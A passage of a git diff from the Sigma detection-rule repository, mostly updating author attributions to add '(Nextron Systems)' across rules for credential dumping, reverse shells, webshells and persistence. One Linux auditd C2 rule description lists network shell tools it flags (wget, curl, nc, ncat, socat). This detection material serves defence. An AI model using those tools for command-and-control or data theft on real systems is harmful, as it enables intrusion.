.../proc_creation_win_vul_java_remote_debugging.yml | 2 +- ...creation_win_wab_execution_from_non_default_location.yml | 2 +- .../proc_creation_win_wab_unusual_parents.yml | 2 +- .../proc_creation_win_weak_or_abused_passwords.yml | 2 +- .../process_creation/proc_creation_win_webshell_chopper.yml | 2 +- .../proc_creation_win_webshell_detection.yml | 2 +- .../process_creation/proc_creation_win_webshell_hacking.yml | 2 +- .../process_creation/proc_creation_win_webshell_spawn.yml | 2 +- .../process_creation/proc_creation_win_wevtutil_recon.yml | 2 +- .../proc_creation_win_whoami_as_priv_user.yml | 2 +- .../process_creation/proc_creation_win_whoami_priv.yml | 2 +- .../proc_creation_win_windows_terminal_susp_children.yml | 2 +- ...c_creation_win_wmi_backdoor_exchange_transport_agent.yml | 2 +- .../proc_creation_win_wmic_computersystem_recon.yml | 2 +- .../process_creation/proc_creation_win_wmic_hotfix_enum.yml | 2 +- .../proc_creation_win_wmic_security_product_uninstall.yml | 2 +- .../process_creation/proc_creation_win_wmic_service.yml | 2 +- .../proc_creation_win_wmic_unquoted_service_search.yml | 2 +- .../proc_creation_win_wpbbin_persistence.yml | 2 +- .../proc_creation_win_wscript_shell_cli.yml | 2 +- .../proc_creation_win_wsl_child_processes_anomalies.yml | 2 +- .../proc_creation_win_wsudo_susp_execution.yml | 2 +- .../proc_creation_win_wusa_susp_cab_extraction.yml | 2 +- ...reation_win_wusa_susp_cap_extraction_from_susp_paths.yml | 2 +- .../windows/process_creation/proc_creation_win_xordump.yml | 2 +- .../registry_add_amsi_providers_persistence.yml | 2 +- ...istry_add_disk_cleanup_handler_new_entry_persistence.yml | 2 +- .../registry_add_renamed_sysinternals_eula_accepted.yml | 2 +- .../registry_add_susp_sysinternals_eula_accepted.yml | 2 +- .../registry_delete_exploit_guard_protected_folders.yml | 2 +- .../registry_delete_mstsc_history_cleared.yml | 2 +- ...istry_delete_removal_index_value_scheduled_task_hide.yml | 2 +- .../registry_event/registry_event_add_local_hidden_user.yml | 2 +- .../registry_event/registry_event_apt_chafer_mar18.yml | 2 +- .../registry/registry_event/registry_event_apt_pandemic.yml | 2 +- .../registry/registry_event/registry_event_hack_wce_reg.yml | 2 +- .../registry_event/registry_event_net_ntlm_downgrade.yml | 2 +- .../registry_event_shell_open_keys_manipulation.yml | 2 +- .../registry_event_silentprocessexit_lsass.yml | 2 +- .../registry_event_stickykey_like_backdoor.yml | 2 +- .../registry_event/registry_event_susp_download_run_key.yml | 2 +- .../registry_event/registry_event_susp_lsass_dll_load.yml | 2 +- .../registry_set/registry_set_aedebug_persistence.yml | 2 +- .../registry/registry_set/registry_set_amsi_com_hijack.yml | 2 +- .../registry_set/registry_set_crashdump_disabled.yml | 2 +- .../registry_set_creation_service_susp_folder.yml | 2 +- .../registry_set_creation_service_uncommon_folder.yml | 2 +- .../registry_set_cve_2020_1048_new_printer_port.yml | 2 +- .../registry_set/registry_set_defender_exclusions.yml | 2 +- .../registry_set_disable_autologger_sessions.yml | 2 +- .../registry_set_disable_macroruntimescanscope.yml | 2 +- .../registry_set_disabled_microsoft_defender_eventlog.yml | 2 +- ...egistry_set_disk_cleanup_handler_autorun_persistence.yml | 2 +- .../registry_set/registry_set_dns_serverlevelplugindll.yml | 2 +- .../registry_set_exploit_guard_susp_allowed_apps.yml | 2 +- .../registry_set_hangs_debugger_persistence.yml | 2 +- .../registry_set/registry_set_hhctrl_persistence.yml | 2 +- .../registry_set_hide_scheduled_task_via_index_tamper.yml | 2 +- .../registry/registry_set/registry_set_mal_adwind.yml | 2 +- .../registry_set/registry_set_new_network_provider.yml | 2 +- .../registry_set_outlook_registry_todaypage.yml | 2 +- .../registry_set/registry_set_outlook_registry_webview.yml | 2 +- .../registry_set/registry_set_persistence_app_paths.yml | 2 +- .../registry_set/registry_set_persistence_autodial_dll.yml | 2 +- .../registry/registry_set/registry_set_persistence_chm.yml | 2 +- ...egistry_set_persistence_com_hijacking_susp_locations.yml | 2 +- .../registry_set_persistence_custom_protocol_handler.yml | 2 +- .../registry_set/registry_set_persistence_ifilter.yml | 2 +- .../registry_set/registry_set_persistence_lsa_extension.yml | 2 +- .../registry_set/registry_set_persistence_mpnotify.yml | 2 +- .../registry_set/registry_set_persistence_mycomputer.yml | 2 +- .../registry_set_persistence_natural_language.yml | 2 +- .../registry_set/registry_set_persistence_typed_paths.yml | 2 +- .../registry_set_policies_associations_tamper.yml | 2 +- .../registry_set_policies_attachments_tamper.yml | 2 +- .../registry_set_powershell_execution_policy.yml | 2 +- .../registry_set_renamed_sysinternals_eula_accepted.yml | 2 +- .../registry_set/registry_set_rpcrt4_etw_tamper.yml | 2 +- .../registry_set/registry_set_services_etw_tamper.yml | 2 +- .../registry/registry_set/registry_set_sip_persistence.yml | 2 +- .../registry_set/registry_set_sophos_av_tamaper.yml | 2 +- .../registry/registry_set/registry_set_special_accounts.yml | 2 +- .../registry_set/registry_set_susp_keyboard_layout_load.yml | 2 +- .../registry_set/registry_set_susp_printer_driver.yml | 2 +- .../registry_set_susp_reg_persist_explorer_run.yml | 2 +- .../registry_set/registry_set_susp_run_key_img_folder.yml | 2 +- .../registry_set/registry_set_suspicious_env_variables.yml | 2 +- .../registry_set/registry_set_turn_on_dev_features.yml | 2 +- .../registry_set/registry_set_uac_bypass_eventvwr.yml | 2 +- .../registry/registry_set/registry_set_uac_bypass_sdclt.yml | 2 +- .../registry_set/registry_set_uac_bypass_winsat.yml | 2 +- .../registry/registry_set/registry_set_uac_bypass_wmp.yml | 2 +- .../registry_set/registry_set_vbs_payload_stored.yml | 2 +- .../registry_set_winlogon_allow_multiple_tssessions.yml | 2 +- rules/windows/sysmon/sysmon_file_block_exe.yml | 2 +- rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml | 2 +- rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml | 2 +- tools/sigma/backends/elasticsearch.py | 2 +- tools/sigma/backends/humio.py | 2 +- tools/sigma/backends/opensearch.py | 2 +- tools/sigma/backends/powershell.py | 2 +- tools/sigma/backends/splunk.py | 2 +- tools/sigma/backends/sumologic.py | 2 +- 1063 files changed, 1066 insertions(+), 1066 deletions(-) diff --git a/other/godmode_sigma_rule.yml b/other/godmode_sigma_rule.yml index 9d017bc40..1288301ad 100644 --- a/other/godmode_sigma_rule.yml +++ b/other/godmode_sigma_rule.yml @@ -17,7 +17,7 @@ title: Godmode Sigma Rule id: def6caac-a999-4fc9-8800-cfeff700ba98 description: 'PoC rule to detect malicious activity - following the principle: if you had only one shot, what would you look for?' status: experimental -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/12/22 modified: 2022/08/04 level: high diff --git a/rules-deprecated/windows/file_event_win_hktl_createminidump.yml b/rules-deprecated/windows/file_event_win_hktl_createminidump.yml index dafefbb83..5f6fd631b 100644 --- a/rules-deprecated/windows/file_event_win_hktl_createminidump.yml +++ b/rules-deprecated/windows/file_event_win_hktl_createminidump.yml @@ -5,7 +5,7 @@ related: - id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d type: derived description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine -author: Florian Roth +author: Florian Roth (Nextron Systems) references: - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass date: 2019/12/22 diff --git a/rules-deprecated/windows/posh_ps_invoke_nightmare.yml b/rules-deprecated/windows/posh_ps_invoke_nightmare.yml index cdefb1c68..80469031b 100644 --- a/rules-deprecated/windows/posh_ps_invoke_nightmare.yml +++ b/rules-deprecated/windows/posh_ps_invoke_nightmare.yml @@ -4,7 +4,7 @@ status: deprecated description: Detects Commandlet name for PrintNightmare exploitation. references: - https://github.com/calebstewart/CVE-2021-1675 -author: Max Altgelt, Tobias Michalski +author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) date: 2021/08/09 modified: 2023/01/02 tags: diff --git a/rules-deprecated/windows/powershell_suspicious_download.yml b/rules-deprecated/windows/powershell_suspicious_download.yml index 4ae8d7ae9..6308b39cc 100644 --- a/rules-deprecated/windows/powershell_suspicious_download.yml +++ b/rules-deprecated/windows/powershell_suspicious_download.yml @@ -5,7 +5,7 @@ description: Detects suspicious PowerShell download command tags: - attack.execution - attack.t1059.001 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/05 modified: 2022/04/11 logsource: diff --git a/rules-deprecated/windows/powershell_suspicious_invocation_generic.yml b/rules-deprecated/windows/powershell_suspicious_invocation_generic.yml index 2acdc5b8d..a9cbabd20 100644 --- a/rules-deprecated/windows/powershell_suspicious_invocation_generic.yml +++ b/rules-deprecated/windows/powershell_suspicious_invocation_generic.yml @@ -5,7 +5,7 @@ description: Detects suspicious PowerShell invocation command parameters tags: - attack.execution - attack.t1059.001 -author: Florian Roth (rule) +author: Florian Roth (Nextron Systems) date: 2017/03/12 modified: 2022/04/11 logsource: diff --git a/rules-deprecated/windows/powershell_suspicious_invocation_specific.yml b/rules-deprecated/windows/powershell_suspicious_invocation_specific.yml index a4e817aaf..4e410a901 100644 --- a/rules-deprecated/windows/powershell_suspicious_invocation_specific.yml +++ b/rules-deprecated/windows/powershell_suspicious_invocation_specific.yml @@ -5,7 +5,7 @@ description: Detects suspicious PowerShell invocation command parameters tags: - attack.execution - attack.t1059.001 -author: Florian Roth (rule), Jonhnathan Ribeiro +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro date: 2017/03/05 modified: 2022/04/11 logsource: diff --git a/rules-deprecated/windows/proc_creation_win_mavinject_proc_inj.yml b/rules-deprecated/windows/proc_creation_win_mavinject_proc_inj.yml index 35f1045cb..3f5f04180 100644 --- a/rules-deprecated/windows/proc_creation_win_mavinject_proc_inj.yml +++ b/rules-deprecated/windows/proc_creation_win_mavinject_proc_inj.yml @@ -2,7 +2,7 @@ title: MavInject Process Injection id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8 status: deprecated description: Detects process injection using the signed Windows tool Mavinject32.exe -author: Florian Roth +author: Florian Roth (Nextron Systems) references: - https://twitter.com/gN3mes1s/status/941315826107510784 - https://reaqta.com/2017/12/mavinject-microsoft-injector/ diff --git a/rules-deprecated/windows/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml b/rules-deprecated/windows/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml index eb5ff39e7..ed280464b 100644 --- a/rules-deprecated/windows/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml +++ b/rules-deprecated/windows/proc_creation_win_powershell_base64_invoke_susp_cmdlets.yml @@ -7,7 +7,7 @@ status: deprecated description: Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets references: - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ -author: pH-T +author: pH-T (Nextron Systems) date: 2022/05/31 modified: 2023/01/30 tags: diff --git a/rules-deprecated/windows/proc_creation_win_powershell_base64_listing_shadowcopy.yml b/rules-deprecated/windows/proc_creation_win_powershell_base64_listing_shadowcopy.yml index 23de7607d..64bea98a4 100644 --- a/rules-deprecated/windows/proc_creation_win_powershell_base64_listing_shadowcopy.yml +++ b/rules-deprecated/windows/proc_creation_win_powershell_base64_listing_shadowcopy.yml @@ -4,7 +4,7 @@ status: deprecated description: Detects base64 encoded listing Win32_Shadowcopy references: - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2022/03/01 modified: 2023/01/30 tags: diff --git a/rules-deprecated/windows/proc_creation_win_renamed_powershell.yml b/rules-deprecated/windows/proc_creation_win_renamed_powershell.yml index 7824df9b1..f6c5b661b 100644 --- a/rules-deprecated/windows/proc_creation_win_renamed_powershell.yml +++ b/rules-deprecated/windows/proc_creation_win_renamed_powershell.yml @@ -4,7 +4,7 @@ status: deprecated description: Detects the execution of a renamed PowerShell often used by attackers or malware references: - https://twitter.com/christophetd/status/1164506034720952320 -author: Florian Roth, frack113 +author: Florian Roth (Nextron Systems), frack113 date: 2019/08/22 modified: 2023/01/18 tags: diff --git a/rules-deprecated/windows/proc_creation_win_renamed_psexec.yml b/rules-deprecated/windows/proc_creation_win_renamed_psexec.yml index 9f764d59d..cbe42f5e1 100644 --- a/rules-deprecated/windows/proc_creation_win_renamed_psexec.yml +++ b/rules-deprecated/windows/proc_creation_win_renamed_psexec.yml @@ -4,7 +4,7 @@ status: depreactaed description: Detects the execution of a renamed PsExec often used by attackers or malware references: - https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/05/21 modified: 2023/01/18 tags: diff --git a/rules-deprecated/windows/proc_creation_win_renamed_rundll32.yml b/rules-deprecated/windows/proc_creation_win_renamed_rundll32.yml index b53f2dbb0..da901b5d6 100644 --- a/rules-deprecated/windows/proc_creation_win_renamed_rundll32.yml +++ b/rules-deprecated/windows/proc_creation_win_renamed_rundll32.yml @@ -4,7 +4,7 @@ status: deprecated description: Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection references: - https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/06/08 modified: 2023/01/18 logsource: diff --git a/rules-deprecated/windows/registry_set_silentprocessexit.yml b/rules-deprecated/windows/registry_set_silentprocessexit.yml index bc15e77d6..919ddb7ea 100644 --- a/rules-deprecated/windows/registry_set_silentprocessexit.yml +++ b/rules-deprecated/windows/registry_set_silentprocessexit.yml @@ -5,7 +5,7 @@ description: Detects changes to the Registry in which a monitor program gets reg references: - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/02/26 modified: 2022/12/19 tags: diff --git a/rules-deprecated/windows/win_susp_esentutl_activity.yml b/rules-deprecated/windows/win_susp_esentutl_activity.yml index 3d658fea4..731281958 100644 --- a/rules-deprecated/windows/win_susp_esentutl_activity.yml +++ b/rules-deprecated/windows/win_susp_esentutl_activity.yml @@ -2,7 +2,7 @@ title: Suspicious Esentutl Use id: 56a8189f-11b2-48c8-8ca7-c54b03c2fbf7 status: deprecated description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/05/23 modified: 2022/04/11 references: diff --git a/rules-deprecated/windows/win_susp_vssadmin_ntds_activity.yml b/rules-deprecated/windows/win_susp_vssadmin_ntds_activity.yml index 3eeef68a1..b3d5a0a3d 100644 --- a/rules-deprecated/windows/win_susp_vssadmin_ntds_activity.yml +++ b/rules-deprecated/windows/win_susp_vssadmin_ntds_activity.yml @@ -2,7 +2,7 @@ title: Activity Related to NTDS.dit Domain Hash Retrieval id: b932b60f-fdda-4d53-8eda-a170c1d97bbd status: deprecated description: Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely -author: Florian Roth, Michael Haag +author: Florian Roth (Nextron Systems), Michael Haag date: 2019/01/16 modified: 2022/04/11 references: diff --git a/rules-placeholder/windows/builtin/security/win_susp_interactive_logons.yml b/rules-placeholder/windows/builtin/security/win_susp_interactive_logons.yml index 21901949d..ecd0b9f93 100644 --- a/rules-placeholder/windows/builtin/security/win_susp_interactive_logons.yml +++ b/rules-placeholder/windows/builtin/security/win_susp_interactive_logons.yml @@ -2,7 +2,7 @@ title: Interactive Logon to Server Systems id: 3ff152b2-1388-4984-9cd9-a323323fdadf status: test description: Detects interactive console logons to Server Systems -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/17 modified: 2021/11/27 logsource: diff --git a/rules-unsupported/win_mal_service_installs.yml b/rules-unsupported/win_mal_service_installs.yml index 623c22029..78f7b9aec 100644 --- a/rules-unsupported/win_mal_service_installs.yml +++ b/rules-unsupported/win_mal_service_installs.yml @@ -1,7 +1,7 @@ title: Malicious Service Installations id: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a description: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities. -author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update) +author: Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update) date: 2017/03/27 modified: 2022/03/21 references: diff --git a/rules/category/antivirus/av_exploiting.yml b/rules/category/antivirus/av_exploiting.yml index 1305e9436..1c97cbb05 100644 --- a/rules/category/antivirus/av_exploiting.yml +++ b/rules/category/antivirus/av_exploiting.yml @@ -7,7 +7,7 @@ references: - https://www.virustotal.com/gui/file/925b0b28472d4d79b4bf92050e38cc2b8f722691c713fc28743ac38551bc3797 - https://www.virustotal.com/gui/file/8f8daabe1c8ceb5710949283818e16c4aa8059bf2ce345e2f2c90b8692978424 - https://www.virustotal.com/gui/file/d9669f7e3eb3a9cdf6a750eeb2ba303b5ae148a43e36546896f1d1801e912466 -author: Florian Roth, Arnim Rupp +author: Florian Roth (Nextron Systems), Arnim Rupp date: 2018/09/09 modified: 2023/01/13 tags: diff --git a/rules/category/antivirus/av_hacktool.yml b/rules/category/antivirus/av_hacktool.yml index 42d153ae3..cf5ede7f8 100644 --- a/rules/category/antivirus/av_hacktool.yml +++ b/rules/category/antivirus/av_hacktool.yml @@ -5,7 +5,7 @@ description: Detects a highly relevant Antivirus alert that reports a hack tool references: - https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/ - https://www.nextron-systems.com/?s=antivirus -author: Florian Roth, Arnim Rupp +author: Florian Roth (Nextron Systems), Arnim Rupp date: 2021/08/16 modified: 2023/01/13 tags: diff --git a/rules/category/antivirus/av_password_dumper.yml b/rules/category/antivirus/av_password_dumper.yml index fc6d7700e..05ed559e0 100644 --- a/rules/category/antivirus/av_password_dumper.yml +++ b/rules/category/antivirus/av_password_dumper.yml @@ -6,7 +6,7 @@ references: - https://www.nextron-systems.com/?s=antivirus - https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619 - https://www.virustotal.com/gui/file/a4edfbd42595d5bddb442c82a02cf0aaa10893c1bf79ea08b9ce576f82749448 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/09/09 modified: 2023/01/18 tags: diff --git a/rules/category/antivirus/av_ransomware.yml b/rules/category/antivirus/av_ransomware.yml index 71f2d62aa..c039c5b5e 100644 --- a/rules/category/antivirus/av_ransomware.yml +++ b/rules/category/antivirus/av_ransomware.yml @@ -9,7 +9,7 @@ references: - https://www.virustotal.com/gui/file/20179093c59bca3acc6ce9a4281e8462f577ffd29fd7bf51cf2a70d106062045 - https://www.virustotal.com/gui/file/554db97ea82f17eba516e6a6fdb9dc04b1d25580a1eb8cb755eeb260ad0bd61d - https://www.virustotal.com/gui/file/69fe77dd558e281621418980040e2af89a2547d377d0f2875502005ce22bc95c -author: Florian Roth, Arnim Rupp +author: Florian Roth (Nextron Systems), Arnim Rupp date: 2022/05/12 modified: 2023/01/13 tags: diff --git a/rules/category/antivirus/av_relevant_files.yml b/rules/category/antivirus/av_relevant_files.yml index 635e09f50..01fd2e9e2 100644 --- a/rules/category/antivirus/av_relevant_files.yml +++ b/rules/category/antivirus/av_relevant_files.yml @@ -4,7 +4,7 @@ status: test description: Detects an Antivirus alert in a highly relevant file path or with a relevant file name references: - https://www.nextron-systems.com/?s=antivirus -author: Florian Roth, Arnim Rupp +author: Florian Roth (Nextron Systems), Arnim Rupp date: 2018/09/09 modified: 2023/01/13 tags: diff --git a/rules/category/antivirus/av_webshell.yml b/rules/category/antivirus/av_webshell.yml index 21165013e..36f8943fd 100644 --- a/rules/category/antivirus/av_webshell.yml +++ b/rules/category/antivirus/av_webshell.yml @@ -13,7 +13,7 @@ references: - https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection - https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection - https://www.virustotal.com/gui/file/13ae8bfbc02254b389ab052aba5e1ba169b16a399d9bc4cb7414c4a73cd7dc78/detection -author: Florian Roth, Arnim Rupp +author: Florian Roth (Nextron Systems), Arnim Rupp date: 2018/09/09 modified: 2023/01/13 tags: diff --git a/rules/linux/auditd/lnx_auditd_coinminer.yml b/rules/linux/auditd/lnx_auditd_coinminer.yml index 7a1cb7d05..fd45113d6 100644 --- a/rules/linux/auditd/lnx_auditd_coinminer.yml +++ b/rules/linux/auditd/lnx_auditd_coinminer.yml @@ -4,7 +4,7 @@ status: test description: Detects command line parameter very often used with coin miners references: - https://xmrig.com/docs/miner/command-line-options -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/10/09 modified: 2022/12/25 tags: diff --git a/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml b/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml index 1bf6b82b3..7c2f8de74 100644 --- a/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml +++ b/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml @@ -2,9 +2,9 @@ title: Suspicious C2 Activities id: f7158a64-6204-4d6d-868a-6e6378b467e0 status: test description: | - Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'. - This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. - These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132) + Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'. + This includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap. + These commands match a few techniques from the tactics "Command and Control", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132) references: - 'https://github.com/Neo23x0/auditd' author: Marie Euler diff --git a/rules/linux/auditd/lnx_auditd_susp_cmds.yml b/rules/linux/auditd/lnx_auditd_susp_cmds.yml index fe42ea2dc..2845a12e1 100644 --- a/rules/linux/auditd/lnx_auditd_susp_cmds.yml +++ b/rules/linux/auditd/lnx_auditd_susp_cmds.yml @@ -4,7 +4,7 @@ status: test description: Detects relevant commands often related to malware or hacking activity references: - Internal Research - mostly derived from exploit code including code in MSF -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/12/12 modified: 2022/10/05 tags: diff --git a/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml b/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml index 41e50458c..86b4ea4f8 100644 --- a/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml +++ b/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml @@ -4,7 +4,7 @@ status: test description: Detects program executions in suspicious non-program folders related to malware or hacking activity references: - Internal Research -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/01/23 modified: 2021/11/27 tags: @@ -20,7 +20,7 @@ detection: exe|startswith: # Temporary folder - '/tmp/' - # Web server + # Web server - '/var/www/' # Standard - '/home/*/public_html/' # Per-user - '/usr/local/apache2/' # Classical Apache diff --git a/rules/linux/builtin/auth/lnx_auth_susp_failed_logons_single_source.yml b/rules/linux/builtin/auth/lnx_auth_susp_failed_logons_single_source.yml index 68481e604..29a30f6ca 100644 --- a/rules/linux/builtin/auth/lnx_auth_susp_failed_logons_single_source.yml +++ b/rules/linux/builtin/auth/lnx_auth_susp_failed_logons_single_source.yml @@ -2,7 +2,7 @@ title: Failed Logins with Different Accounts from Single Source - Linux id: fc947f8e-ea81-4b14-9a7b-13f888f94e18 status: test description: Detects suspicious failed logins with different user accounts from a single source system -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/02/16 modified: 2022/11/26 tags: diff --git a/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml b/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml index bc75eea23..43da1ba42 100644 --- a/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml +++ b/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml @@ -4,7 +4,7 @@ status: stable description: Detects relevant ClamAV messages references: - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/01 tags: - attack.resource_development diff --git a/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml b/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml index 23d523acf..616740cba 100644 --- a/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml +++ b/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious session with two users present references: - https://research.checkpoint.com/2020/apache-guacamole-rce/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/07/03 modified: 2021/11/27 tags: diff --git a/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml b/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml index bff668189..3022534da 100755 --- a/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml +++ b/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious shell commands used in various Equation Group scripts and tools references: - https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/04/09 modified: 2021/11/27 tags: diff --git a/rules/linux/builtin/lnx_buffer_overflows.yml b/rules/linux/builtin/lnx_buffer_overflows.yml index 1304e4b30..17bb8612f 100644 --- a/rules/linux/builtin/lnx_buffer_overflows.yml +++ b/rules/linux/builtin/lnx_buffer_overflows.yml @@ -4,7 +4,7 @@ status: stable description: Detects buffer overflow attempts in Unix system log files references: - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/01 tags: - attack.t1068 diff --git a/rules/linux/builtin/lnx_clear_syslog.yml b/rules/linux/builtin/lnx_clear_syslog.yml index d368561ea..af04269f5 100644 --- a/rules/linux/builtin/lnx_clear_syslog.yml +++ b/rules/linux/builtin/lnx_clear_syslog.yml @@ -4,7 +4,7 @@ status: test description: Detects specific commands commonly used to remove or empty the syslog references: - https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474 -author: Max Altgelt +author: Max Altgelt (Nextron Systems) date: 2021/09/10 modified: 2022/11/26 tags: diff --git a/rules/linux/builtin/lnx_ldso_preload_injection.yml b/rules/linux/builtin/lnx_ldso_preload_injection.yml index 91bd27cfd..fe3b96902 100644 --- a/rules/linux/builtin/lnx_ldso_preload_injection.yml +++ b/rules/linux/builtin/lnx_ldso_preload_injection.yml @@ -4,7 +4,7 @@ status: test description: Detects the ld.so preload persistence file. See `man ld.so` for more information. references: - https://man7.org/linux/man-pages/man8/ld.so.8.html -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/05/05 modified: 2022/10/09 tags: diff --git a/rules/linux/builtin/lnx_shell_susp_commands.yml b/rules/linux/builtin/lnx_shell_susp_commands.yml index 646af4980..34ae447f6 100644 --- a/rules/linux/builtin/lnx_shell_susp_commands.yml +++ b/rules/linux/builtin/lnx_shell_susp_commands.yml @@ -7,7 +7,7 @@ references: - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb - http://pastebin.com/FtygZ1cg - https://artkond.com/2017/03/23/pivoting-guide/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/08/21 modified: 2021/11/27 tags: diff --git a/rules/linux/builtin/lnx_shell_susp_log_entries.yml b/rules/linux/builtin/lnx_shell_susp_log_entries.yml index a17b2c81e..39052a786 100644 --- a/rules/linux/builtin/lnx_shell_susp_log_entries.yml +++ b/rules/linux/builtin/lnx_shell_susp_log_entries.yml @@ -2,7 +2,7 @@ title: Suspicious Log Entries id: f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1 status: test description: Detects suspicious log entries in Linux log files -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/25 modified: 2021/11/27 tags: diff --git a/rules/linux/builtin/lnx_shell_susp_rev_shells.yml b/rules/linux/builtin/lnx_shell_susp_rev_shells.yml index 82aa7f352..58d50b2a2 100644 --- a/rules/linux/builtin/lnx_shell_susp_rev_shells.yml +++ b/rules/linux/builtin/lnx_shell_susp_rev_shells.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell references: - https://alamot.github.io/reverse_shells/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/04/02 modified: 2021/11/27 tags: diff --git a/rules/linux/builtin/lnx_shellshock.yml b/rules/linux/builtin/lnx_shellshock.yml index d3851a0bd..8e9b5d2f4 100644 --- a/rules/linux/builtin/lnx_shellshock.yml +++ b/rules/linux/builtin/lnx_shellshock.yml @@ -4,7 +4,7 @@ status: test description: Detects shellshock expressions in log files references: - https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/03/14 modified: 2022/10/09 tags: diff --git a/rules/linux/builtin/lnx_susp_jexboss.yml 